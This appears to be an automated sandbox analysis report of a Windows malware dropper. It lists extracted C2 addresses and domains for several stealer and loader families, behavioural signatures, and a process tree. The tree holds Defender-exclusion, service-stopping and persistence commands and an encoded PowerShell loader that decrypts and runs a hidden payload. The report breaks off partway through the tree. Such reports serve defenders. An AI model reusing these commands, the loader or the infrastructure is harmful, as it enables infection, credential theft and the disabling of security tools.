Resubmissions

14-05-2024 20:58

240514-zsfmfsgb6s 10

14-05-2024 20:53

240514-zplpasfh6x 10

14-05-2024 19:25

240514-x4yajach28 10

Analysis

  • max time kernel
    87s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 19:25

Errors

Reason
Machine shutdown

General

  • Target

    3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe

  • Size

    1.8MB

  • MD5

    2307c3f2702a53fdc03bf2f05fe51a25

  • SHA1

    5d31c179f4d5e0831fb5ad877fbfe8fe6b88a26d

  • SHA256

    3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77

  • SHA512

    14c7feba21ae7b6b3e3d1bf06a8dea88c784ba1e5e86ffd9724be66ef880bfb89c66ae5f906e1d7c9fc18635b892ec32255ecad57dd71c11d4e40a2f9922e6bf

  • SSDEEP

    49152:VKrUl9aoaN6dMU27MyNw2e9ObxiFlWukA+dEoBpck6Co:VKrb6bmw2mOliFlWuQxpcN

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.7

Attributes
  • install_dir

    7af68cdb52

  • install_file

    axplons.exe

  • strings_key

    e2ce58e78f631ed97d01fe7b70e85d5e

  • url_paths

    /zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

gcleaner

C2

185.172.128.90

5.42.64.56

5.42.65.64

Extracted

Family

lumma

C2

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

https://smallelementyjdui.shop/api

https://sofaprivateawarderysj.shop/api

https://lineagelasserytailsd.shop/api

https://tendencyportionjsuk.shop/api

https://headraisepresidensu.shop/api

https://appetitesallooonsj.shop/api

https://minorittyeffeoos.shop/api

https://prideconstituiiosjk.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 10 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • XMRig Miner payload 4 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 41 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 23 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
    "C:\Users\Admin\AppData\Local\Temp\3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
      "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1684
      • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
        "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2468
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:1968
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
            • Checks computer location settings
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3884
            • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
              "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1532
            • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
              "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2176
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
              5⤵
                PID:4488
                • C:\Windows\SysWOW64\choice.exe
                  choice /C Y /N /D Y /T 3
                  6⤵
                    PID:3376
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 352
                4⤵
                • Program crash
                PID:4660
            • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
              "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:4956
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                4⤵
                  PID:4996
              • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2580
              • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                3⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:1556
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3448
                  • C:\Windows\SysWOW64\sc.exe
                    Sc stop GameServerClient
                    5⤵
                    • Launches sc.exe
                    PID:4464
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService remove GameServerClient confirm
                    5⤵
                    • Executes dropped EXE
                    PID:4576
                  • C:\Windows\SysWOW64\sc.exe
                    Sc delete GameSyncLink
                    5⤵
                    • Launches sc.exe
                    PID:748
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService remove GameSyncLink confirm
                    5⤵
                    • Executes dropped EXE
                    PID:1508
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:2020
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService start GameSyncLink
                    5⤵
                    • Executes dropped EXE
                    PID:4488
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                  4⤵
                    PID:4232
                    • C:\Windows\SysWOW64\sc.exe
                      Sc stop GameServerClientC
                      5⤵
                      • Launches sc.exe
                      PID:4448
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService remove GameServerClientC confirm
                      5⤵
                      • Executes dropped EXE
                      PID:3952
                    • C:\Windows\SysWOW64\sc.exe
                      Sc delete PiercingNetLink
                      5⤵
                      • Launches sc.exe
                      PID:3560
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService remove PiercingNetLink confirm
                      5⤵
                      • Executes dropped EXE
                      PID:1588
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:2068
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService start PiercingNetLink
                      5⤵
                      • Executes dropped EXE
                      PID:2568
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                    4⤵
                      PID:4996
                      • C:\Windows\SysWOW64\sc.exe
                        Sc delete GameSyncLinks
                        5⤵
                        • Launches sc.exe
                        PID:1932
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService remove GameSyncLinks confirm
                        5⤵
                        • Executes dropped EXE
                        PID:2516
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:3860
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService start GameSyncLinks
                        5⤵
                        • Executes dropped EXE
                        PID:2232
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                      4⤵
                        PID:4228
                    • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2980
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        4⤵
                          PID:1556
                      • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2504
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          4⤵
                            PID:4396
                        • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                          3⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          PID:400
                          • C:\Windows\SysWOW64\schtasks.exe
                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                            4⤵
                            • Creates scheduled task(s)
                            PID:4556
                          • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:4332
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 452
                              5⤵
                              • Program crash
                              PID:4904
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 480
                              5⤵
                              • Program crash
                              PID:2524
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 756
                              5⤵
                              • Program crash
                              PID:3884
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 796
                              5⤵
                              • Program crash
                              PID:1340
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 796
                              5⤵
                              • Program crash
                              PID:2868
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 816
                              5⤵
                              • Program crash
                              PID:2316
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 776
                              5⤵
                              • Program crash
                              PID:2244
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 808
                              5⤵
                              • Program crash
                              PID:2468
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 1060
                              5⤵
                              • Program crash
                              PID:3216
                          • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            PID:4964
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 460
                              5⤵
                              • Program crash
                              PID:4644
                          • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:3984
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2284
                            • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                              5⤵
                                PID:624
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  6⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:1596
                            • C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:4968
                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:4692
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                5⤵
                                  PID:700
                                  • C:\Windows\system32\wusa.exe
                                    wusa /uninstall /kb:890830 /quiet /norestart
                                    6⤵
                                      PID:3596
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop UsoSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:2336
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1600
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop wuauserv
                                    5⤵
                                    • Launches sc.exe
                                    PID:1564
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop bits
                                    5⤵
                                    • Launches sc.exe
                                    PID:3148
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop dosvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:3488
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                    5⤵
                                      PID:2100
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      5⤵
                                        PID:2944
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        5⤵
                                          PID:1488
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                          5⤵
                                            PID:680
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe delete "WSNKISKT"
                                            5⤵
                                            • Launches sc.exe
                                            PID:4596
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                            5⤵
                                            • Launches sc.exe
                                            PID:5300
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop eventlog
                                            5⤵
                                            • Launches sc.exe
                                            PID:5444
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe start "WSNKISKT"
                                            5⤵
                                            • Launches sc.exe
                                            PID:5452
                                      • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:756
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEMALAAgADAAeAA2AEYALAAgADAAeAAzADYALAAgADAAeAAwAEUALAAgADAAeAAyAEMALAAgADAAeAA0ADYALAAgADAAeAAwADMALAAgADAAeAA4AEMALAAgADAAeABCADUALAAgADAAeABGAEYALAAgADAAeAAxADAALAAgADAAeABBADUALAAgADAAeAAyADUALAAgADAAeAA4AEIALAAgADAAeAAxAEIALAAgADAAeAA3ADkALAAgADAAeABCAEMALAAgADAAeABBADUALAAgADAAeAAzADkALAAgADAAeAA0ADgALAAgADAAeABFADIALAAgADAAeAA2ADIALAAgADAAeAA4ADUALAAgADAAeAAyADgALAAgADAAeAAzADcALAAgADAAeABCAEYALAAgADAAeAA0ADEALAAgADAAeABBAEQALAAgADAAeAAxADgALAAgADAAeAAxADYALAAgADAAeAA5AEMALAAgADAAeAAwAEQAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADUARgAsACAAMAB4AEYAQwAsACAAMAB4ADgAQwAsACAAMAB4ADcAQwAsACAAMAB4ADMAOQAsACAAMAB4ADcANQAsACAAMAB4ADAAOQAsACAAMAB4AEYAQwAsACAAMAB4AEIAOQAsACAAMAB4ADcAMQAsACAAMAB4AEYAQwAsACAAMAB4AEUAQgAsACAAMAB4ADQAQQAsACAAMAB4AEUARQAsACAAMAB4AEIARgAsACAAMAB4ADcANgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2636
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                            5⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2068
                                            • C:\Users\Admin\Pictures\7B8C1qavcaKW5zXGaq3PbJDN.exe
                                              "C:\Users\Admin\Pictures\7B8C1qavcaKW5zXGaq3PbJDN.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4268
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 452
                                                7⤵
                                                • Program crash
                                                PID:4964
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 480
                                                7⤵
                                                • Program crash
                                                PID:1464
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 748
                                                7⤵
                                                • Program crash
                                                PID:4772
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 768
                                                7⤵
                                                • Program crash
                                                PID:2980
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 820
                                                7⤵
                                                • Program crash
                                                PID:3652
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 828
                                                7⤵
                                                • Program crash
                                                PID:3472
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 860
                                                7⤵
                                                • Program crash
                                                PID:1416
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 836
                                                7⤵
                                                • Program crash
                                                PID:4424
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 1040
                                                7⤵
                                                • Program crash
                                                PID:1576
                                            • C:\Users\Admin\Pictures\JUDIyS2XaP8zzr4XINCmO04n.exe
                                              "C:\Users\Admin\Pictures\JUDIyS2XaP8zzr4XINCmO04n.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:1084
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -nologo -noprofile
                                                7⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:2132
                                              • C:\Users\Admin\Pictures\JUDIyS2XaP8zzr4XINCmO04n.exe
                                                "C:\Users\Admin\Pictures\JUDIyS2XaP8zzr4XINCmO04n.exe"
                                                7⤵
                                                  PID:4188
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 800
                                                  7⤵
                                                  • Program crash
                                                  PID:1932
                                              • C:\Users\Admin\Pictures\OWtTjfExSmXp5VLaoyC8KEr4.exe
                                                "C:\Users\Admin\Pictures\OWtTjfExSmXp5VLaoyC8KEr4.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:464
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:888
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 992
                                                    8⤵
                                                    • Program crash
                                                    PID:4840
                                                • C:\Users\Admin\Pictures\OWtTjfExSmXp5VLaoyC8KEr4.exe
